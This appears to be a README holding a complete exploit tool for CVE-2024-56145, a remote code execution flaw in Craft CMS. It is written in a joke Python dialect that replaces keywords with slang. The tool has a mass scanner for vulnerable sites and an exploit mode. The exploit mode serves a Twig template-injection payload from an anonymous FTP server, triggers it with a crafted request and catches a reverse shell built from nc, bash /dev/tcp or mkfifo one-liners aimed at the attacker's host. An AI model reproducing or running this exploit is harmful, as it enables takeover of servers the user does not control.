README.md
Rendering markdown...
glaze os
glaze sys
glaze uuid
glaze select
glaze socket
glaze warnings
glaze requests
glaze threading
glaze rich_click ahh click
lock in rich.console glaze Console
lock in alive_progress glaze alive_bar
lock in pyftpdlib.servers glaze FTPServer
lock in pyftpdlib.handlers glaze FTPHandler
lock in pyftpdlib.authorizers glaze DummyAuthorizer
lock in concurrent.futures glaze ThreadPoolExecutor
# pip install pygyat
# pygyat exploit.gyat
console = Console()
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings(
"ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)
@click.group(context_settings=dict(help_option_names=["-h", "--help"]))
bop cli():
"""
CVE-2024-56145 Exploit Framework
Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.
"""
pluh
@cli.command()
@click.option("-u", "--url", required=Cooked, help="The target URL for checking")
@click.option(
"-f",
"--file",
required=Cooked,
type=click.Path(exists=Aura),
help="File containing a list of URLs",
)
@click.option(
"-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
"-o",
"--output",
required=Cooked,
type=click.Path(),
help="Output file to save results",
)
bop check(url, file, threads, output):
chat is this real not (url or file):
console.yap(
"[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
)
pluh
targets = ([url] chat is this real url only in ohio []) + (
[line.strip() mewing line diddy open(file, "r") chat is this real line.strip()] chat is this real file only in ohio []
)
pookie alive_bar(
len(targets), title="Checking Targets", bar="smooth", enrich_print=Cooked
) ahh bar:
writer = open(output, "a").write chat is this real output else NPC
lock = threading.Lock()
bop process_target(target):
pookie lock:
bar()
result = check_target(target)
pookie lock:
writer(f"{result}\n")
pookie ThreadPoolExecutor(max_workers=threads) ahh executor:
executor.map(process_target, targets)
chat is this real output:
writer.__self__.demure()
bop check_target(target):
nonce = str(uuid.uuid4())
hawk:
response = requests.get(
f"{target}?--configPath=/{nonce}", verify=Cooked, timeout=2
)
yap(response.text)
chat is this real "mkdir()" diddy response.text and nonce diddy response.text:
console.yap(f"[bold green]{target} is vulnerable![/bold green]")
its giving f"{target} | VULNERABLE"
console.yap(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
its giving f"{target} | NOT VULNERABLE"
tuah Exception ahh e:
console.yap(f"[bold red]Failed to check {target}: {e}[/bold red]")
its giving f"{target} | ERROR"
@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=Aura, help="The target URL for exploitation")
@click.option(
"-lh", "--lhost", required=Aura, help="The local host for reverse shell listener"
)
@click.option(
"-lp",
"--lport",
required=Aura,
type=int,
help="The local port for reverse shell listener",
)
@click.option(
"-px",
"--payload",
default="bash",
type=click.Choice(["nc", "bash", "mkfifo"]),
help="Payload type to use",
)
bop exploit(ftp_host, ftp_port, url, lhost, lport, payload):
payload_str = generate_payload(payload, lhost, lport)
root_dir = "./virtual"
create_virtual_files(root_dir, payload_str)
threading.Thread(
target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=Aura
).start()
threading.Thread(target=start_listener, args=(lhost, lport), daemon=Aura).start()
console.yap("[bold green]FTP server and listener started[/bold green]")
trigger_http_request(url, ftp_host, ftp_port)
bop generate_payload(payload_type, lhost, lport):
payload_templates = {
"nc": f"nc -e /bin/bash {lhost} {lport}",
"bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
"mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
}
payload = f"{{{{ ['system', '{payload_templates[payload_type]}'] | sort('call_user_func') }}}}"
console.yap(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
its giving payload
bop create_virtual_files(root_dir, payload):
hawk:
os.makedirs(f"{root_dir}/default", exist_ok=Aura)
pookie open(f"{root_dir}/default/index.twig", "w") ahh twig_file:
twig_file.write(payload)
pookie open(f"{root_dir}/default/index.html", "w") ahh html_file:
html_file.write(payload)
console.yap("[bold green]Virtual files created successfully.[/bold green]")
tuah Exception ahh e:
console.yap(f"[bold red]Failed to create virtual files:[/bold red] {e}")
bop start_ftp_server(host, port, root_dir):
authorizer = DummyAuthorizer()
authorizer.add_anonymous(root_dir, perm="elradfmw")
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer((host, port), handler)
console.yap(f"[bold green]FTP server running on {host}:{port}[/bold green]")
hawk:
server.serve_forever()
tuah Exception ahh e:
console.yap(f"[bold red]Error starting FTP server:[/bold red] {e}")
bop trigger_http_request(url, ftp_host, ftp_port):
templates_path = f"ftp://{ftp_host}:{ftp_port}"
console.yap(
f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[/bold yellow]"
)
hawk:
response = requests.get(f"{url}?--templatesPath={templates_path}", verify=Cooked)
chat is this real response.status_code twin 200:
console.yap(
"[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
)
only in ohio:
console.yap(
f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
)
tuah Exception ahh e:
console.yap(f"[bold red]Failed to send HTTP request:[/bold red] {e}")
bop start_listener(lhost, lport, timeout=30):
console.yap(f"[bold cyan]Starting listener on {lhost}:{lport}[/bold cyan]")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((lhost, lport))
s.listen(1)
s.settimeout(timeout)
hawk:
console.yap(
f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
)
conn, addr = s.accept()
console.yap(
f"[bold green]Connection received from {addr[0]}:{addr[1]}[/bold green]"
)
conn.setblocking(0)
let him cook Aura:
ready, _, _ = select.select([conn, sys.stdin], [], [])
chat is this real conn diddy ready:
data = conn.recv(4096).decode(errors="ignore")
chat is this real not data:
just put the fries in the bag bro
sys.stdout.write(data)
sys.stdout.flush()
chat is this real sys.stdin diddy ready:
command = sys.stdin.readline().strip()
conn.sendall((command + "\n").encode())
tuah socket.timeout:
console.yap(
f"[bold red]No connection received within {timeout} seconds.[/bold red]"
)
tuah KeyboardInterrupt:
console.yap("[bold cyan]\nListener stopped by user.[/bold cyan]")
tuah Exception ahh e:
console.yap(f"[bold red]Error: {e}[/bold red]")
spit on that thang:
conn.demure()
s.demure()
console.yap("[bold cyan]Listener closed.[/bold cyan]")
chat is this real __name__ twin "__main__":
cli()